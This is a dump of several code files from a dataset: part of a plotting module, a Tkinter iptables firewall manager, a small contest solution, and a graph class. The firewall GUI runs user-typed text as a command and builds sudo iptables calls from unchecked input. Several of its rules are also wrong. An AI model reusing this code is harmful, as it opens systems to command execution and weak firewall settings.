ax2.set_yscale('symlog', linthreshy=0.001)\n\n helper.write_and_close_fig(\n fig = fig,\n filename = filename,\n )\n\n return\n\n def delta_u_plots(self,\n delta_eigenvalues,\n structure_factory,\n prefix,\n ):\n\n helper = self.parent.plotting_object.helper\n\n #delta_max_sel = numpy.argmax(numpy.abs(delta_eigenvalues), axis=-1)\n #delta_indices = tuple(numpy.indices(delta_eigenvalues.shape[:-1])) + (delta_max_sel, )\n #delta_b = constants.EIGHTPISQ * delta_eigenvalues[delta_indices]\n delta_b = constants.EIGHTPISQ * delta_eigenvalues.mean(axis=-1)\n\n hierarchies = [structure_factory.custom_copy(iso=db, blank_copy=False) for db in delta_b]\n\n of = self.plotting_object.multi_hierarchy_plot_by_residue(\n hierarchies = hierarchies,\n plot_function = self.plotting_object.lineplot,\n plot_kw_args = dict(\n title = 'Changes over last cycle',\n x_label = 'Residue',\n y_label = 'B-factor Changes ($\\AA^2$)',\n legends = self.parent.level_names,\n marker = 'o',\n legend_kw_args = dict(ncol=3, bbox_to_anchor=(0.5, 1.1), loc=8, borderaxespad=0.),\n ),\n prefix = prefix,\n residue_values_function = numpy.mean, #max?\n y_array_values_function = None,\n )\n\n return of\n","repo_name":"tjlane/pandda","sub_path":"lib-python/pandemic/adp/tracking/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":18776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"19912991096","text":"from tkinter import *\nimport subprocess\nfrom tkinter.messagebox import askyesno, showwarning, showinfo\nimport iptc\n\nauto_nat_color = 'lightblue'\ndeny_forward_color = 'lightblue'\ndeny_ping_color = 'lightblue'\ndeny_scan_color = 'lightblue'\ndeny_flooding_color = 'lightblue'\ndrop_fragments_color = 'lightblue'\ndrop_XMAS_color = 'lightblue'\ndrop_null_color = 'lightblue'\ndrop_multirst_color = 'lightblue'\ndrop_invalid_color = 'lightblue'\n\n\nclass MY_IP_GUI():\n def __init__(self, iptables_window):\n self.iptables_window = iptables_window\n\n def set_IP_window(self):\n self.iptables_window.title(\"Iptables Firewall\") # 窗口名\n self.iptables_window.geometry('640x420+470+260')\n self.iptables_window[\"bg\"] = \"PaleGoldenrod\"\n self.frame_top = Frame(self.iptables_window, relief=RAISED, borderwidth=2)\n self.frame_top.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.iptables_button = Button(self.frame_top, text=\"帮助\", bg=\"lightblue\", width=15, height=2,\n command=self.open_help)\n self.iptables_button.pack(anchor=E, side='right')\n self.indus_firewall_Label = Label(self.frame_top, text=\"Iptables firewall\", bg=\"lightyellow\", width=123,\n height=2)\n self.indus_firewall_Label.pack(side='left', anchor=CENTER)\n self.frame_down = Frame(self.iptables_window, borderwidth=2)\n self.frame_down.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.add_suggest_button = Button(self.frame_down, text=\"添加推荐规则\", bg=\"lightblue\", width=50, height=2,\n command=self.add_suggest_rule)\n self.add_suggest_button.pack(anchor=N, side='top', pady=10)\n self.rule_input = Text(self.frame_down, width=50, height=2)\n self.rule_input.pack(side='top', anchor=N)\n self.add_self_button = Button(self.frame_down, text=\"添加自定义规则\", bg=\"lightblue\", width=50, height=2,\n command=self.add_self_rules)\n self.add_self_button.pack(anchor=N, side='top')\n self.flush_all_button = Button(self.frame_down, text=\"删除所有规则\", bg=\"lightblue\", width=50, height=2,\n command=self.flushall)\n self.flush_all_button.pack(anchor=N, side='bottom', pady=10)\n self.rule_manage_button = Button(self.frame_down, text=\"指定规则管理\", bg=\"lightblue\", width=50, height=2,\n command=self.rule_manipulate)\n self.rule_manage_button.pack(anchor=N, side='bottom')\n self.choose_table = LabelFrame(self.frame_down, text=\"选择表\", width=50, height=2)\n self.choose_table.pack(anchor=N, side='top', pady=5)\n TABLES = [('Filter', 1), ('NAT', 2), ('Raw', 3), ('Mangle', 4)]\n self.table_num = IntVar()\n self.table_num.set(1)\n for TABLE, num in TABLES:\n b = Radiobutton(self.choose_table, text=TABLE, variable=self.table_num, value=num)\n b.pack(side='left', anchor=N, padx=10)\n\n def add_suggest_rule(self):\n suggest_rule_window = Toplevel(self.iptables_window)\n SUGGEST_RULE_window = SUGGEST_RULE_GUI(suggest_rule_window)\n SUGGEST_RULE_window.set_SUGGEST_RULE_window()\n suggest_rule_window.mainloop()\n\n def rule_manipulate(self):\n self.num = self.table_num.get()\n rule_window = Toplevel(self.iptables_window)\n RULE_window = MY_RULE_GUI(rule_window, self.num)\n RULE_window.set_RULE_window()\n RULE_window.show_table_rules()\n rule_window.mainloop()\n\n def open_help(self):\n help_window = Toplevel(self.iptables_window)\n HELP_window = MY_HELP_GUI(help_window)\n HELP_window.set_HELP_window()\n help_window.mainloop()\n\n def add_self_rules(self):\n rules_content = self.rule_input.get(1.0, END).strip().replace(\"\\n\", \"\")\n rules = rules_content.split()\n if len(rules) > 1:\n try:\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n except:\n showwarning('警告', '您输入的规则不正确')\n\n else:\n showwarning('警告', '输入的规则不能为空')\n\n def flushall(self):\n for chain in iptc.Table(iptc.Table.FILTER).chains:\n chain.flush()\n for chain in iptc.Table(iptc.Table.NAT).chains:\n chain.flush()\n for chain in iptc.Table(iptc.Table.RAW).chains:\n chain.flush()\n for chain in iptc.Table(iptc.Table.MANGLE).chains:\n chain.flush()\n rules_content1 = 'sudo iptables -F'.strip().replace(\"\\n\", \"\")\n rules_content2 = 'sudo iptables -X'.strip().replace(\"\\n\", \"\")\n rules1 = rules_content1.split()\n rules2 = rules_content2.split()\n subprocess.check_output(rules1)\n subprocess.check_output(rules2)\n showinfo('notice', '所有规则均删除')\n\n\nclass MY_HELP_GUI():\n def __init__(self, help_window):\n self.help_window = help_window\n\n def set_HELP_window(self):\n self.help_window.title(\"帮助文档\") # 窗口名\n self.help_window.geometry('640x420+670+360')\n self.frame_top = Frame(self.help_window, relief=RAISED, borderwidth=2)\n self.frame_top.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.text_Scroll = Scrollbar(self.frame_top)\n self.text_Scroll.pack(side='right', fill='y')\n self.help_input = Text(self.frame_top, yscrollcommand=self.text_Scroll.set, width=70, height=60, font=(\"newspaper\", 12))\n self.help_input.pack(side='right', fill=BOTH)\n self.help_input.insert(END, '1.iptables中的“四表五链”及“堵通策略”A.“四表”是指,iptables的功能——filter, '\n 'nat, mangle, raw.filter, \\n控制数据包是否允许进出及转发(INPUT、OUTPUT、FORWARD),'\n '\\n可以控制的链路有input, forward, outputnat, 控制数据包中地址转换,\\n可以控制的链路有prerouting,'\n ' input, output, postroutingmangle,修改数据包中的原数据,\\n可以控制的链路有prerouting,'\n ' input, forward, output, postroutingraw,控制nat表中连接追踪机制的启用状况,'\n '\\n可以控制的链路有prerouting, output注:在centos7中,还有security表,不过这里不作介绍'\n '常用命令:-A 追加规则-->iptables -A INPUT\\n-D 删除规则-->iptables -D INPUT 1(编号)\\n-R 修改规则-->iptables -R '\n 'INPUT 1 -s 192.168.12.0 -j DROP 取代现行规则,顺序不变(1是位置)\\n-I 插入规则-->'\n 'iptables -I INPUT 1 --dport 80 -j ACCEPT 插入一条规则,原本位置上的规则将会往后移动一个顺位'\n '\\n-L 查看规则-->iptables -L INPUT 列出规则链中的所有规则'\n '\\n-N 新的规则-->iptables -N allowed 定义新的规则\\n通用参数:'\n '\\n-p 协议 例:iptables -A INPUT -p tcp'\n '\\n-s源地址 例:iptables -A INPUT -s 192.168.1.1'\n '\\n-d目的地址 例:iptables -A INPUT -d 192.168.12.1'\n '\\n-sport源端口 例:iptables -A INPUT -p tcp --sport 22'\n '\\n-dport目的端口 例:iptables -A INPUT -p tcp --dport 22'\n '\\n-i指定入口网卡 例:iptables -A INPUT -i eth0'\n '\\n-o指定出口网卡 例:iptables -A FORWARD -o eth0\\n-j 指定要进行的处理动作\\n常用的ACTION:\\nDROP:丢弃'\n '\\nREJECT:明示拒绝\\nACCEPT:接受\\nSNAT基于原地址的转换\\nsource--指定原地址 '\n ' \\n 比如我们现在要将所有192.168.10.0网段的IP在经过的时候全都转换成172.16.100.1这个假设出来的外网地址:'\n '\\niptables -t nat -A POSTROUTING -s 192.168.10.0/24 -j SNAT --to-source 172.16.100.1(外网有效ip)'\n '\\n这样,只要是来自本地网络的试图通过网卡访问网络的,都会被统统转换成172.16.100.1这个IP.'\n '\\nMASQUERADE(动态伪装)--家用带宽获取的外网ip,就是用到了动态伪装'\n '\\niptables -t nat -A POSTROUTING -s 192.168.10.0/24 -j MASQUERADE'\n '\\nDNAT目标地址转换'\n '\\ndestination-指定目标地址'\n '\\niptables -t nat -A PREROUTING -d 192.168.10.18 -p tcp --dport 80 -j DNAT --to-destination 172.16.100.2'\n '\\n10.18访问80端口转换到100.2上'\n '\\nMASQUERADE:源地址伪装'\n '\\nREDIRECT:重定向:主要用于实现端口重定向'\n '\\nMARK:打防火墙标记的'\n '\\nRETURN:返回 在自定义链执行完毕后使用返回,来返回原规则链。\\n链 (chain)'\n '\\n每个表都有自己的一组内置链,可以对链进行自定义,这样就可以建立一组规则,'\n '\\nfilter表中的input、output和forward链'\n '\\n匹配(match)'\n '\\n每个iptables规则都包含一组匹配以及一个目标,iptables匹配指的是数据包必须匹配的条件,只有当'\n '\\n数据包满足所有的匹配条件时,iptables才能根据由该规则的目标所指定的动作来处理该数据包'\n '\\n匹配都在iptable的命令行中指定'\n '\\nsource--匹配源ip地址或网络'\n '\\ndestination (-d)--匹配目标ip地址或网络'\n '\\nprotocol (-p)--匹配ip值'\n '\\nin-interface (-i)--流入接口(例如,eth0)'\n '\\nout-interface (-o)--流出接口'\n '\\nstate--匹配一组连接状态'\n '\\nstring--匹配应用层数据字节序列'\n '\\ncomment--在内核内存中为一个规则关联多达256个字节的注释数据'\n '\\n目标(target)'\n '\\niptables支持一组目标,用于数据包匹配一条规则时触发一个动作'\n '\\nACCEPT--允许数据包通过'\n '\\nDROP--丢弃数据包,不对该数据包做进一步的处理,对接收栈而言,就好像该数据包从来没有被接收一样'\n '\\nLOG--将数据包信息记录到syslog'\n '\\nREJECT--丢弃数据包,同时发送适当的响应报文(针对TCP连接的TCP重要数据包或针对UDP数据包的ICMP端口不可达消息)\\nRETURN--在调用链中继续处理数据包')\n\n\nclass MY_RULE_GUI():\n def __init__(self, rule_window, table_num):\n self.show_list = [[], [], [], []]\n self.rule_window = rule_window\n self.table_num_choose = table_num\n self.table_choose = None\n self.table_name = None\n\n def set_RULE_window(self):\n self.rule_window.title(\"rule management\") # 窗口名\n self.rule_window.geometry('1040x320+370+360')\n self.frame_top = Frame(self.rule_window, relief=RAISED, borderwidth=2)\n self.frame_top.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.rules_select = Frame(self.frame_top)\n self.rules_select.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.rules_Scroll = Scrollbar(self.rules_select)\n self.rules_Scroll.pack(side='right', fill='y')\n self.rule_printout = Listbox(self.rules_select, yscrollcommand=self.rules_Scroll.set, width=200, height=5)\n self.rule_printout.pack(side='right', fill=BOTH)\n self.rules_Scroll.config(command=self.rule_printout.yview)\n self.flushtable_button = Button(self.frame_top, text=\"删除表内规则\", bg=\"lightblue\", width=20, height=2,\n command=self.flushtable)\n self.flushtable_button.pack(anchor=W, side='left', padx=50)\n self.delete_rule_button = Button(self.frame_top, text=\"删除此条规则\", bg=\"lightblue\", width=20, height=2,\n command=self.delete_rule)\n self.delete_rule_button.pack(anchor=W, side='left', padx=50)\n\n def show_table_rules(self):\n if self.table_num_choose == 1:\n iptc.Table(iptc.Table.FILTER).refresh()\n self.table_choose = iptc.Table(iptc.Table.FILTER)\n self.table_name = 'filter'\n if self.table_num_choose == 2:\n iptc.Table(iptc.Table.NAT).refresh()\n self.table_choose = iptc.Table(iptc.Table.NAT)\n self.table_name = 'nat'\n if self.table_num_choose == 3:\n iptc.Table(iptc.Table.RAW).refresh()\n self.table_choose = iptc.Table(iptc.Table.RAW)\n self.table_name = 'raw'\n if self.table_num_choose == 4:\n iptc.Table(iptc.Table.MANGLE).refresh()\n self.table_choose = iptc.Table(iptc.Table.MANGLE)\n self.table_name = 'mangle'\n\n print(self.table_choose)\n print(type(self.table_choose))\n for chain in self.table_choose.chains:\n for rule in chain.rules:\n rule_print = ''\n rule_print += str(chain.name)\n rule_print += (\"Rule\" + \"proto:\" + str(rule.protocol) + \"src:\" + str(rule.src) + \"dst:\" + str(rule.dst)\n + \"in:\" + str(rule.in_interface) + \"out:\" + str(rule.out_interface))\n rule_print += str(rule.target.name)\n self.show_list[0].append(rule_print)\n self.show_list[1].append(str(chain.name))\n self.show_list[2].append(chain)\n self.show_list[3].append(rule)\n print(self.show_list[0])\n print(self.show_list[1])\n print(self.show_list[2])\n print(self.show_list[3])\n for item in self.show_list[0]:\n self.rule_printout.insert(END, item)\n\n def flushtable(self):\n for chain in self.table_choose.chains:\n chain.flush()\n\n self.show_list[0].clear()\n self.show_list[1].clear()\n self.show_list[2].clear()\n self.show_list[3].clear()\n self.rule_printout.delete(0, 'end')\n showinfo('NOTICE', 'table is empty now')\n\n def delete_rule(self):\n rule_index = self.rule_printout.index(ACTIVE) + 1\n\n rules_content = ('sudo iptables -t %s -D %s %d' % (\n self.table_name, self.show_list[1][rule_index - 1], rule_index)).strip().replace(\"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n self.rule_printout.delete(ACTIVE)\n chain = self.show_list[2][rule_index - 1]\n chain.delete_rule(self.show_list[3][rule_index - 1])\n print(self.show_list)\n self.show_list[1].pop(rule_index - 1)\n self.show_list[0].pop(rule_index - 1)\n self.show_list[2].pop(rule_index - 1)\n self.show_list[3].pop(rule_index - 1)\n print(self.show_list)\n showinfo('NOTICE', '规则已删除')\n\n\nclass SUGGEST_RULE_GUI():\n def __init__(self, suggest_rule_window):\n self.suggest_rule_window = suggest_rule_window\n\n def set_SUGGEST_RULE_window(self):\n global auto_nat_color, deny_forward_color, deny_ping_color, deny_scan_color, deny_flooding_color, drop_fragments_color, \\\n drop_XMAS_color, drop_null_color, drop_multirst_color, drop_invalid_color\n self.suggest_rule_window.title(\"Rules recommend\") # 窗口名\n self.suggest_rule_window.geometry('680x400+670+360')\n self.frame_top = Frame(self.suggest_rule_window, relief=RAISED, borderwidth=2)\n self.frame_top.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n\n self.frame_top = Frame(self.suggest_rule_window, relief=RAISED, borderwidth=2)\n self.frame_top.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.POSTROUTING_button = Button(self.frame_top, text=\"跨局域网转发\", bg=auto_nat_color, width=20, height=2,\n command=self.post_masquerade)\n self.POSTROUTING_button.pack(anchor=W, side='left')\n self.deny_forward_button = Button(self.frame_top, text=\"禁止转发\", bg=deny_forward_color, width=20, height=2,\n command=self.deny_forward)\n self.deny_forward_button.pack(anchor=W, side='left')\n self.deny_ping_button = Button(self.frame_top, text=\"禁止ping\", bg=deny_ping_color, width=20, height=2,\n command=self.deny_ping)\n self.deny_ping_button.pack(anchor=W, side='left')\n self.exit_button = Button(self.frame_top, text=\"exit\", bg=\"LightSalmon\", width=20, height=2,\n command=self.exit)\n self.exit_button.pack(anchor=W, side='left')\n self.frame_2 = Frame(self.suggest_rule_window, relief=RAISED, borderwidth=2)\n self.frame_2.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n\n self.frame_2_1 = Frame(self.frame_2, relief=RAISED, borderwidth=1)\n self.frame_2_1.pack(padx=2, pady=2, ipady=2, ipadx=2, side='left')\n self.frame_funcions_input1_ip = Frame(self.frame_2_1, borderwidth=1)\n self.frame_funcions_input1_ip.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.dstip_Label = Label(self.frame_funcions_input1_ip, text=\"dst ip\", bg=\"lightyellow\", width=10, height=2)\n self.dstip_Label.pack(side='left', anchor=CENTER)\n self.dstip_input = Text(self.frame_funcions_input1_ip, width=18, height=2)\n self.dstip_input.pack(side='left', anchor=CENTER)\n self.sendip_Label = Label(self.frame_funcions_input1_ip, text=\"send to ip\", bg=\"lightyellow\", width=10,\n height=2)\n self.sendip_Label.pack(side='left', anchor=CENTER)\n self.sendip_input = Text(self.frame_funcions_input1_ip, width=18, height=2)\n self.sendip_input.pack(side='left', anchor=CENTER)\n\n self.frame_2_2 = Frame(self.frame_2_1, borderwidth=1)\n self.frame_2_2.pack(padx=2, pady=2, ipady=2, ipadx=2)\n self.dstp_Label = Label(self.frame_2_2, text=\"dst port\", bg=\"lightyellow\", width=10,\n height=2)\n self.dstp_Label.pack(side='left', anchor=CENTER)\n self.dstp_input = Text(self.frame_2_2, width=18, height=2)\n self.dstp_input.pack(side='left', anchor=CENTER)\n self.sendp_Label = Label(self.frame_2_2, text=\"send to port\", bg=\"lightyellow\", width=10,\n height=2)\n self.sendp_Label.pack(side='left', anchor=CENTER)\n self.sendp_input = Text(self.frame_2_2, width=18, height=2)\n self.sendp_input.pack(side='left', anchor=CENTER)\n self.set_proxy_button = Button(self.frame_2, text=\"设置代理\", bg=\"lightblue\", width=15, height=3,\n command=self.set_proxy)\n self.set_proxy_button.pack(anchor=E, side='right')\n\n self.frame_3 = Frame(self.suggest_rule_window, relief=RAISED, borderwidth=2)\n self.frame_3.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.whitelist_input = Text(self.frame_3, width=18, height=2)\n self.whitelist_input.pack(side='left', anchor=CENTER)\n self.whitelist_button = Button(self.frame_3, text=\"添加白名单\", bg=\"lightblue\", width=15, height=1,\n command=self.add_whitelist)\n self.whitelist_button.pack(side='left', anchor=CENTER)\n self.blacklist_input = Text(self.frame_3, width=18, height=2)\n self.blacklist_input.pack(side='left', anchor=CENTER)\n self.blacklist_button = Button(self.frame_3, text=\"添加黑名单\", bg=\"lightblue\", width=15, height=1,\n command=self.add_blacklist)\n self.blacklist_button.pack(side='left', anchor=CENTER)\n self.frame_4 = Frame(self.suggest_rule_window, relief=RAISED, borderwidth=2)\n self.frame_4.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.deny_scan_button = Button(self.frame_4, text=\"防止端口扫描\", bg=deny_scan_color, width=20, height=2,\n command=self.deny_scan)\n self.deny_scan_button.pack(side='left', anchor=CENTER)\n self.deny_flooding_button = Button(self.frame_4, text=\"防止泛洪攻击\", bg=deny_flooding_color, width=20, height=2,\n command=self.deny_flooding)\n self.deny_flooding_button.pack(side='left', anchor=CENTER)\n self.frame_5 = Frame(self.suggest_rule_window, relief=RAISED, borderwidth=2)\n self.frame_5.pack(padx=2, pady=2, ipady=2, ipadx=2, side='top')\n self.deny_fragments_button = Button(self.frame_5, text=\"丢弃碎片数据包\", bg=drop_fragments_color, width=14, height=1,\n command=self.drop_fragments)\n self.deny_fragments_button.pack(side='left', anchor=CENTER)\n self.deny_XMAS_button = Button(self.frame_5, text=\"丢弃异常XMAS\", bg=drop_XMAS_color, width=14, height=1,\n command=self.drop_XMAS)\n self.deny_XMAS_button.pack(side='left', anchor=CENTER)\n\n self.deny_null_button = Button(self.frame_5, text=\"丢弃null数据包\", bg=drop_null_color, width=14, height=1,\n command=self.drop_null)\n self.deny_null_button.pack(side='left', anchor=CENTER)\n self.deny_multi_rst_button = Button(self.frame_5, text=\"丢弃重复RST请求\", bg=drop_multirst_color, width=14, height=1,\n command=self.deny_multirst)\n self.deny_multi_rst_button.pack(side='left', anchor=CENTER)\n self.deny_invalid_button = Button(self.frame_5, text=\"丢弃无效数据包\", bg=drop_invalid_color, width=14, height=1,\n command=self.drop_invalid)\n self.deny_invalid_button.pack(side='left', anchor=CENTER)\n\n def exit(self):\n try:\n ans = askyesno(title='Warning', message='are you sure to exit?')\n if ans:\n self.suggest_rule_window.destroy()\n else:\n return\n except:\n print('can not close')\n\n def post_masquerade(self):\n global auto_nat_color\n rules_content1 = 'sudo iptables -t nat -A POSTROUTING -s 192.168.0.0/24 -d 192.168.1.0/24 -p tcp -j MASQUERADE'.strip().replace(\n \"\\n\", \"\")\n rules_content2 = 'sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE'.strip().replace(\"\\n\", \"\")\n rules1 = rules_content1.split()\n rules2 = rules_content2.split()\n subprocess.check_output(rules1)\n subprocess.check_output(rules2)\n self.POSTROUTING_button.configure(bg=\"LightSkyBlue\")\n auto_nat_color = 'Wheat'\n\n def deny_forward(self):\n global deny_forward_color\n rules_content = 'sudo iptables -A FORWARD -j REJECT'.strip().replace(\"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n self.deny_forward_button.configure(bg=\"LightSkyBlue\")\n deny_forward_color = 'Wheat'\n\n def deny_ping(self):\n global deny_ping_color\n rules_content = 'sudo iptables -A FORWARD -p icmp -m icmp --icmp-type echo-request -j DROP'.strip().replace(\n \"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n self.deny_ping_button.configure(bg=\"LightSkyBlue\")\n deny_ping_color = 'Wheat'\n\n def set_proxy(self):\n dstip = self.dstip_input.get(1.0, END).strip().replace(\"\\n\", \"\")\n dstp = self.dstp_input.get(1.0, END).strip().replace(\"\\n\", \"\")\n sendip = self.sendip_input.get(1.0, END).strip().replace(\"\\n\", \"\")\n sendp = self.sendp_input.get(1.0, END).strip().replace(\"\\n\", \"\")\n rules_content = ('sudo iptables -t nat -A PREROUTING -d %s -dport %s -p tcp -j DNAT --to-destination %s:%s' % (\n dstip, dstp, sendip, sendp)).strip().replace(\"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n showinfo('NOTICE', '代理已成功添加')\n\n def add_whitelist(self):\n whiteip = self.whitelist_input.get(1.0, END).strip().replace(\"\\n\", \"\")\n rules_content = ('sudo iptables -t nat -A PREROUTING -s %s -p all -j ACCEPT' % whiteip).strip().replace(\"\\n\",\n \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n showinfo('NOTICE', '白名单已成功添加')\n\n def add_blacklist(self):\n blackip = self.blacklist_input.get(1.0, END).strip().replace(\"\\n\", \"\")\n rules_content = ('sudo iptables -t filter -A FORWARD -s %s -p tcp -j DROP' % blackip).strip().replace(\"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n showinfo('NOTICE', '黑名单已成功添加')\n\n def deny_scan(self):\n global deny_scan_color\n rules_content = 'sudo iptables -A FORWARD -p tcp --tcp-flags SYN,ACK,FIN,RST RST -m limit --limit 1/s -j ACCEPT'.strip().replace(\n \"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n self.deny_scan_button.configure(bg=\"LightSkyBlue\")\n deny_scan_color = 'Wheat'\n\n def deny_flooding(self):\n global deny_flooding_color\n rules_content = 'sudo iptables -A FORWARD -p icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEPT'.strip().replace(\n \"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n self.deny_flooding_button.configure(bg=\"LightSkyBlue\")\n deny_flooding_color = 'Wheat'\n\n def drop_fragments(self):\n global drop_fragments_color\n rules_content = 'sudo iptables -A FORWARD -p tcp ! --syn -m state --state NEW -j DROP'.strip().replace(\"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n self.deny_fragments_button.configure(bg=\"LightSkyBlue\")\n drop_fragments_color = 'Wheat'\n\n def drop_XMAS(self):\n global drop_XMAS_color\n subprocess.check_output(\n 'sudo iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP'.strip().replace(\"\\n\", \"\").split())\n subprocess.check_output(\n 'sudo iptables -A INPUT -p tcp --tcp-flags ALL FIN,PSH,URG -j DROP'.strip().replace(\"\\n\", \"\").split())\n subprocess.check_output(\n 'sudo iptables -A INPUT -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP'.strip().replace(\"\\n\",\n \"\").split())\n self.deny_XMAS_button.configure(bg=\"LightSkyBlue\")\n drop_XMAS_color = 'Wheat'\n\n def drop_null(self):\n global drop_null_color\n rules_content = 'sudo iptables -A OUTPUT -p tcp --tcp-flags ALL NONE -j DROP'.strip().replace(\"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n self.deny_null_button.configure(bg=\"LightSkyBlue\")\n drop_null_color = 'Wheat'\n\n def drop_invalid(self):\n global drop_invalid_color\n subprocess.check_output(\n 'sudo iptables -A INPUT -m state --state INVALID -j DROP'.strip().replace(\"\\n\", \"\").split())\n subprocess.check_output(\n 'sudo iptables -A FORWARD -m state --state INVALID -j DROP'.strip().replace(\"\\n\", \"\").split())\n subprocess.check_output(\n 'sudo iptables -A OUTPUT -m state --state INVALID -j DROP'.strip().replace(\"\\n\", \"\").split())\n self.deny_invalid_button.configure(bg=\"LightSkyBlue\")\n drop_invalid_color = 'Wheat'\n\n def deny_multirst(self):\n global drop_multirst_color\n rules_content = 'sudo iptables -A INPUT -p tcp -m tcp --tcp-flags RST RST -m limit --limit 10/second --limit-burst 30 -j ACCEPT'.strip().replace(\n \"\\n\", \"\")\n rules = rules_content.split()\n output = subprocess.check_output(rules)\n print('Have %d bytes in output' % len(output))\n print(output)\n self.deny_multi_rst_button.configure(bg=\"LightSkyBlue\")\n drop_multirst_color = 'Wheat'\n","repo_name":"wuguobeijing/StratosphereLinuxIPS-dev","sub_path":"tcpproxy/GUI_iptables.py","file_name":"GUI_iptables.py","file_ext":"py","file_size_in_byte":30224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"36856103951","text":"for _ in range(int(input())):\n n, k, q = map(int, input().split())\n a = [int(x) for x in input().split()]\n numways = 0\n streak = 0\n for i in range(n):\n if a[i] <= q:\n streak += 1\n else:\n streak = 0\n\n if streak >= k:\n numways += streak-k+1\n print(numways)","repo_name":"JaydenPahukula/competitive-coding","sub_path":"Codeforces/878/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"8434701994","text":"inf = float(\"inf\")\n\nclass GraphError(ValueError):\n pass\n\n\n# 邻接矩阵的实现\nclass Graph:\n def __init__(self, mat, unconn=1):\n # unconn服务于在构造图对象的时候可以通过参数为无关连的情况提供一个特殊值\n # 主要参数mat,表示出事的邻接矩阵,要求其是一个二维的表参数,\n # 提供图的基本构架,主要确定定点个数\n # 先确定是否合法,检测给定矩阵是否为方阵\n vnum = len(mat)\n # vnum:端点数\n for x in mat:\n if len(x) != vnum:\n # check if it is square\n raise ValueError(\"Argument for 'Graph'\")\n self._mat = [mat[i][:] for i in range(vnum)]\n self._unconn = unconn\n self._vnum = vnum\n\n def vertex_num(self):\n return self._vnum\n\n def _invalid(self, v):\n return 0 > v or v > self._vnum\n\n def add_vertex(self):\n raise GraphError(\"Adj_Matrix does nnot support 'add_vertex'\")\n\n def add_edge(self, vi, vj, val=1):\n if self._invalid(vi) or self._invalid(vj):\n raise GraphError(str(vi) + ' or ' + str(vj) +\n \"is not a valid vertex.\")\n self._mat[vi][vj] = val\n\n def get_edge(self, vi, vj):\n if self._invalid(vi) or self._invalid(vj):\n raise GraphError(str(vi) + ' or ' + str(vj) +\n \"is not a valid vertex.\")\n return self._mat[vi][vj]\n\n def out_edges(self, vi):\n if self._invalid(vi):\n raise GraphError(str(vi)+ \"is not a valid vertex.\")\n return self._out_edges(self._mat[vi], self._unconn)\n\n @staticmethod\n def _out_edges(row, unconn):\n edges = []\n for i in range(len(row)):\n if row[i] != unconn:\n edges.append((i, row[i]))\n return edges\n\n def __str__(self):\n return \"{\\n\" + \",\\n\".join(map(str, self._mat)) + \"\\n}\" \\\n + \"\\nUnconnected: \" + str(self._unconn)\n\n# 邻接表实现\n# 能够压缩大小\n# 每个顶点v的所有邻接边用一个list对象表示,\n# 元素形式为(边的终点, 权重)\nclass GraphAL(Graph):\n def __init__(self, mat=[], unconn = 0):\n vnum = len(mat)\n for x in mat:\n if len(x) != vnum:\n raise ValueError(\"Argument for GraphAL\")\n self._mat = [Graph._out_edges(mat[i], unconn)\n for i in range(vnum)]\n self._vnum = vnum\n self._unconn = unconn\n\n def add_vertex(self):\n self._mat.append([])\n self._vnum += 1\n return self._vnum - 1\n\n def add_edge(self, vi, vj, val=1):\n if self._vnum == 0:\n raise GraphError(\"Cannot add edge to empty graph\")\n if self._invalid(vi) or self._invalid(vj) :\n raise GraphError(str(vi) + ' or ' + str(vj) +\n \"is not a valid vertex.\")\n row = self._mat[vi]\n i = 0\n while i < len(row):\n if row[i][0] == vj:\n self._mat[vi][i] == (vj, val)\n return\n if row[i][0] > vj:\n break\n i += 1\n self._mat[vi].insert(i, (vj, val))\n\n\n def get_edge(self, vi, vj):\n if self._invalid(vi) or self._invalid(vj):\n raise GraphError(str(vi) + ' or ' + str(vj) +\n \"is not a valid vertex.\")\n for i, val in self._mat[vi]:\n if i == vj:\n return val\n return self._unconn\n\n def out_edges(self, vi):\n if self._invalid(vi):\n raise GraphError(str(vi) + \" is not a valid vertex.\")\n return self._mat[vi]\n\n\nclass StackUnderFlow(ValueError):\n pass\n # 栈下溢\n\n# 利用list写stack\nclass 